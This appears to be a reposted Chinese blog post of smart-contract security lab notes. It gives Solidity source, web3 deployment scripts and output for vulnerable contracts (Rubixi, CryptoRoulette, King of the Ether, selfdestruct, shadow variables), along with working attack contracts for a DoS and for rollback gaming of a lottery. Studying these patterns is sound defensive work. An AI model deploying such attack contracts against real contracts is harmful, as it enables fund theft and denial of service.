var token1Contract = web3.eth.contract([{"constant":false,"inputs":[],"name":"deposit2","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"deposit1","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"payable":true,"type":"fallback","stateMutability":"payable"}]);
var token1 = token1Contract.new({
     data: '0x60606040526000600155341561001157fe5b5b6102d5806100216000396000f30060606040523615610060576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063539c0f1414610069578063a9059cbb14610073578063aa8c217c146100ca578063c8f73d98146100f0575b6100675b5b565b005b6100716100fa565b005b341561007b57fe5b6100b0600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061014a565b604051808215151515815260200191505060405180910390f35b34156100d257fe5b6100da610253565b6040518082815260200191505060405180910390f35b6100f8610259565b005b34600260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b565b6000600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054821115801561019b5750600082115b156102435781600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506001905061024d565b6000905061024d565b5b92915050565b60015481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b5600a165627a7a72305820a24e461a2afcb4a74d1313d9b0f89de5f4079479e350bdbf0dbd3358f5c1909b0029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xab11788d6ba4f6473557fbb9eddfa3f5bbe7effe transactionHash: 0x98831308fe0c78991154368bcf70cf203b4a45a9321b3e87d6dc9e1d04bf5b20

Rubixi漏洞
pragma solidity ^0.4.22;

contract rubixi{
    uint private balance = 0;
    uint private collectedFees = 0;
    uint private feePercent = 10;
    uint private pyramidMultiplier = 300;
    uint private payoutOrder = 0;
    //address private creator;
    address public creator;
    
    function DynamicPyramid(){
        creator = msg.sender;
    }
    function getCreator() public  returns (address){
    return creator;
  }
}
var rubixiContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"creator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"getCreator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"DynamicPyramid","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var rubixi = rubixiContract.new({
     data: '0x6080604052600080556000600155600a60025561012c600355600060045534801561002957600080fd5b506101e0806100396000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806302d05d3f1461005c5780630ee2cb10146100b357806367f809e91461010a575b600080fd5b34801561006857600080fd5b50610071610121565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156100bf57600080fd5b506100c8610147565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561011657600080fd5b5061011f610171565b005b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b33600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505600a165627a7a72305820e14a35a76611bde0e6af783bb3a29b1c275f98ea55d44d72640b31d1613e05690029', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xef9bd8324a06275cf4ad1721bf1e3e3bbd2ea13f transactionHash: 0xc55c83651f34e706052663a8550a22e998235c224a611c525d8f5ea16ec238e2

CryptoRoulette攻击
// https://github.com/misterch0c/Solidlity-Vulnerable/blob/master/traps/CryptoRoulette.sol
// https://etherscan.io/address/0x94602b0E2512DdAd62a935763BF1277c973B2758

pragma solidity ^0.4.19;

// CryptoRoulette
//
// Guess the number secretly stored in the blockchain and win the whole contract balance!
// A new number is randomly chosen after each try.
//
// To play, call the play() method with the guessed number (1-20).  Bet price: 0.1 ether

contract CryptoRoulette { 

    uint256 private secretNumber;
    uint256 public lastPlayed;
    uint256 public betPrice = 0.1 ether;
    address public ownerAddr;

    struct Game {
        address player;
        uint256 number;
    }
    Game[] public gamesPlayed;

    function CryptoRoulette() public {
        ownerAddr = msg.sender;
        shuffle();
    }

    function shuffle() internal {
        // randomly set secretNumber with a value between 1 and 20
        //secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1;
        //这里为了方便做实验验证,用固定数字1代替,不再shuffle
        secretNumber = 1;
    }

    function play(uint256 number) payable public {
        require(msg.value >= betPrice && number <= 10);

        Game game;
        game.player = msg.sender;
        game.number = number;
        gamesPlayed.push(game);

        if (number == secretNumber) {
            // win!
            msg.sender.transfer(this.balance);
        }

        shuffle();
        lastPlayed = now;
    }

    function kill() public {
        if (msg.sender == ownerAddr && now > lastPlayed + 1 days) {
            suicide(msg.sender);
        }
    }

    function() public payable { }
}
var cryptorouletteContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"uint256"}],"name":"gamesPlayed","outputs":[{"name":"player","type":"address"},{"name":"number","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"kill","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"number","type":"uint256"}],"name":"play","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"ownerAddr","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastPlayed","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"betPrice","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var cryptoroulette = cryptorouletteContract.new({
     data: '0x606060405267016345785d8a0000600255341561001b57600080fd5b33600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061007761007c6401000000000261043f176401000000009004565b610086565b6001600081905550565b6104f5806100956000396000f300606060405260043610610078576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063382cf0a61461007a57806341c0e1b5146100e45780636898f82b146100f95780639c675eaa14610111578063c533913214610166578063cfd8a1751461018f575b005b341561008557600080fd5b61009b60048080359060200190919050506101b8565b604051808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020018281526020019250505060405180910390f35b34156100ef57600080fd5b6100f761020b565b005b61010f600480803590602001909190505061028e565b005b341561011c57600080fd5b61012461040d565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b341561017157600080fd5b610179610433565b6040518082815260200191505060405180910390f35b341561019a57600080fd5b6101a2610439565b6040518082815260200191505060405180910390f35b6004818154811015156101c757fe5b90600052602060002090600202016000915090508060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16908060010154905082565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614801561026e5750620151806001540142115b1561028c573373ffffffffffffffffffffffffffffffffffffffff16ff5b565b600060025434101580156102a35750600a8211155b15156102ae57600080fd5b338160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508181600101819055506004805480600101828161030e9190610449565b916000526020600020906002020160008390919091506000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600182015481600101555050506000548214156103fa573373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f1935050505015156103f957600080fd5b5b61040261043f565b426001819055505050565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015481565b60025481565b6001600081905550565b81548183558181151161047657600202816002028360005260206000209182019101610475919061047b565b5b505050565b6104c691905b808211156104c257600080820160006101000a81549073ffffffffffffffffffffffffffffffffffffffff0219169055600182016000905550600201610481565b5090565b905600a165627a7a7230582029d7523a92663fda0e1c1500a9e90438e3ee9f19b84b0d40b6736d9c85e2b5c10029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x7d0721e53dba437ece0f8611696573cf17b75179 transactionHash: 0xbc852383090eb0a78e82a4d6ec0eebe69f7f2d2930f88bc48746880d38b1bb5f

King of the Ether Throne攻击(DOS)
pragma solidity ^0.4.10;

contract PresidentOfCountry {
    address public president;
    uint256 public price;

    function PresidentOfCountry(uint256 _price) {
        require(_price > 0);
        price = _price;
        president = msg.sender;
    }

    function becomePresident() payable {
        require(msg.value >= price); // must pay the price to become president
        president.transfer(price);   // we pay the previous president
        president = msg.sender;      // we crown the new president
        price = price * 2;           // we double the price to become president
    }

}

contract Attack { 
    function () { revert(); }

    function Attack(address _target) payable {
        _target.call.value(msg.value)(bytes4(keccak256("becomePresident()")));
    }
 }

第一个合约PresidentOfCountry:

var _price = 10 ;
var presidentofcountryContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"becomePresident","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":true,"inputs":[],"name":"president","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":true,"inputs":[],"name":"price","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_price","type":"uint256"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var presidentofcountry = presidentofcountryContract.new( _price,
{
     data: '0x6060604052341561000c57fe5b604051602080610284833981016040528080519060200190919050505b6000811115156100395760006000fd5b8060018190555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101f1806100936000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631e1e8f3714610051578063324a13761461005b578063a035b1fe146100ad575bfe5b6100596100d3565b005b341561006357fe5b61006b610199565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34156100b557fe5b6100bd6101bf565b6040518082815260200191505060405180910390f35b60015434101515156100e55760006000fd5b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6001549081150290604051809050600060405180830381858888f19350505050151561014957fe5b33600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506002600154026001819055505b565b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600154815600a165627a7a7230582049386a5a90e375f2c14966092170560795fb153ef1eff2214e6fe7157b84d3fe0029', 
    
     from: web3.eth.accounts[0], 
     gas: '10000000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x025b689415e02b896d6cc021ad56ff38e8ae0a93 transactionHash: 0x3109ad838eb20a89f8513f3f411f8872022a8d4d6f2560eff8ad1b0a96e380dc

第二个合约Attack:

部署合约时想传入msg.value即向合约转账

在如下数字10行位置加上value:xxx即可,如果value是最后一个参数,后面不加逗号

var _target = "0x025b689415e02b896d6cc021ad56ff38e8ae0a93";
var attackContract =  web3.eth.contract([{"inputs":[{"name":"_target","type":"address"}],"payable":true,"type":"constructor","stateMutability":"payable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var attack = attackContract.new(_target,
{
     data: '0x606060405260405160208061012e833981016040528080519060200190919050505b8073ffffffffffffffffffffffffffffffffffffffff163460405180807f6265636f6d65507265736964656e742829000000000000000000000000000000815250601101905060405180910390207c01000000000000000000000000000000000000000000000000000000009004906040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180905060006040518083038185886185025a03f19350505050505b505b6045806100e96000396000f30060606040525b3415600c57fe5b60175b60006000fd5b565b0000a165627a7a72305820df530af82568fcd6ab34a79c043e30a64ee0deeb38ad4ac330cfc9e546adb9280029', 
    

     from: web3.eth.accounts[1], 
     gas: '4700000',
     value: 40
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x64a8df8e846d40335b9f3072e4e187568646f879 transactionHash: 0x7effac1203afb6a5b2dd500f3ee8398a9b24611d0dc6f3843da7784040e2831f

call-after-destruct攻击
pragma solidity ^0.4.24;
 
contract selfdestructGame{
    address owner;
 
    constructor() payable {
        owner = msg.sender;
    }
     
    function ownedEth() public constant returns(uint256){
        return this.balance;
    }
     function deposit() public payable{}
 
    function destruct(address _who) public {
        selfdestruct(_who);
    }
}
var selfdestructgameContract =  web3.eth.contract([{"constant":false,"inputs":[{"name":"_who","type":"address"}],"name":"destruct","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"ownedEth","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"deposit","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]);
var selfdestructgame = selfdestructgameContract.new({
     data: '0x6080604052336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061013a806100536000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631beb26151461005c57806352d225181461009f578063d0e30db0146100ca575b600080fd5b34801561006857600080fd5b5061009d600480360381019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506100d4565b005b3480156100ab57600080fd5b506100b46100ed565b6040518082815260200191505060405180910390f35b6100d261010c565b005b8073ffffffffffffffffffffffffffffffffffffffff16ff5b60003073ffffffffffffffffffffffffffffffffffffffff1631905090565b5600a165627a7a72305820fbdc0b210f7e78e037ba804ab1291f1798da7290fcc6b3e863785f59b06b5ddc0029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:1000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x4973329ea175750eb8eb3ce89c6fb4935370e502 transactionHash: 0x4e2df136792bb470ed450355e64d2f4dbf0eb13d03140fd124f415505178672d

回滚攻击
pragma solidity ^0.4.19;

contract Alice{
    function random() internal returns (uint8){
        return 11;
    }
   function() payable{}
    function guess(uint8 num) payable public returns (bool){
        require(msg.value >= 1 ether);

        uint8 rand = random();
        if(num > rand-3 && num < rand+3){
            msg.sender.transfer(2 ether);
        }
        else{
          return false;
        }
    }
}

contract Bob{
    function rollback(Alice alice, int8 num) public {
        uint256  balance1 = this.balance;
        bool  isSucceed = address(alice).call.gas(10000).value(1 ether)(bytes4(keccak256("guess(int8)")), num);
        uint256  balance2 = this.balance;
      
        // 没有中奖则回滚
        if(balance2 < balance1){
            revert();
        }
    }
}

第一个合约Alice:

var aliceContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"num","type":"uint8"}],"name":"guess","outputs":[{"name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var alice = aliceContract.new({
     data: '0x6060604052341561000f57600080fd5b6101518061001e6000396000f300606060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680634ba4c16b14610043575b005b61005c600480803560ff16906020019091905050610076565b604051808215151515815260200191505060405180910390f35b600080670de0b6b3a7640000341015151561009057600080fd5b61009861011c565b90506003810360ff168360ff161180156100ba57506003810160ff168360ff16105b1561010c573373ffffffffffffffffffffffffffffffffffffffff166108fc671bc16d674ec800009081150290604051600060405180830381858888f19350505050151561010757600080fd5b610115565b60009150610116565b5b50919050565b6000600b9050905600a165627a7a72305820e39fa2e1da7684bbe7afc299d2ac9995bcf4d0f408c328a106387893ff5f22240029', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

第二个合约Bob:

var bobContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"alice","type":"address"},{"name":"num","type":"int8"}],"name":"rollback","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var bob = bobContract.new({
     data: '0x6060604052341561000f57600080fd5b6101d38061001e6000396000f300606060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638956bc0a14610046575b600080fd5b341561005157600080fd5b610089600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803560000b90602001909190505061008b565b005b60008060003073ffffffffffffffffffffffffffffffffffffffff163192508473ffffffffffffffffffffffffffffffffffffffff16612710670de0b6b3a764000060405180807f677565737328696e743829000000000000000000000000000000000000000000815250600b01905060405180910390207c010000000000000000000000000000000000000000000000000000000090049190876040518463ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808260000b60000b8152602001915050600060405180830381858988f194505050505091503073ffffffffffffffffffffffffffffffffffffffff16319050828110156101a057600080fd5b50505050505600a165627a7a72305820566a463b50c26dc01f0cd796d581b0d7d33cf052fe4cd481bd212169e35d17e20029', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
影子变量攻击
pragma solidity 0.4.26;

contract Shadow {
    bool public unlocked = false;   // slot0

    struct Record{
        bytes32 name;
        address addr;
    }

    mapping(address => Record) public registRecord; //slot1
    event Log(address addr, bool msg);

    function regist(bytes32 _name, address _addr) public {
        Record newRecord; 
        newRecord.name = _name; // slot0
        newRecord.addr = _addr; // slot1

        emit Log(msg.sender, unlocked);
    }
}
var shadowContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"registRecord","outputs":[{"name":"name","type":"bytes32"},{"name":"addr","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"unlocked","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_name","type":"bytes32"},{"name":"_addr","type":"address"}],"name":"regist","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":false,"name":"addr","type":"address"},{"indexed":false,"name":"msg","type":"bool"}],"name":"Log","type":"event"}]);
var shadow = shadowContract.new({
     data: '0x608060405260008060006101000a81548160ff02191690831515021790555034801561002a57600080fd5b506102c48061003a6000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630ba2d89b1461005c5780636a5e2650146100ee57806372a987611461011d575b600080fd5b34801561006857600080fd5b5061009d600480360381019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061016e565b6040518083600019166000191681526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019250505060405180910390f35b3480156100fa57600080fd5b506101036101b2565b604051808215151515815260200191505060405180910390f35b34801561012957600080fd5b5061016c6004803603810190808035600019169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506101c4565b005b60016020528060005260406000206000915090508060000154908060010160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905082565b6000809054906101000a900460ff1681565b600082816000018160001916905550818160010160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507fc2b78da6ebaaf30e7b39205082fd41dfc9a310fbfaf5624e77e427c39211c350336000809054906101000a900460ff16604051808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001821515151581526020019250505060405180910390a15050505600a165627a7a723058209d4f2f003f7db6eff32225d2ab6ef2304fb9bccaccfa94f5ed7064ab7aaeb4a60029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/2990405.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-09-23
下一篇 2022-09-23

发表评论

登录后才能评论

评论列表(0条)

保存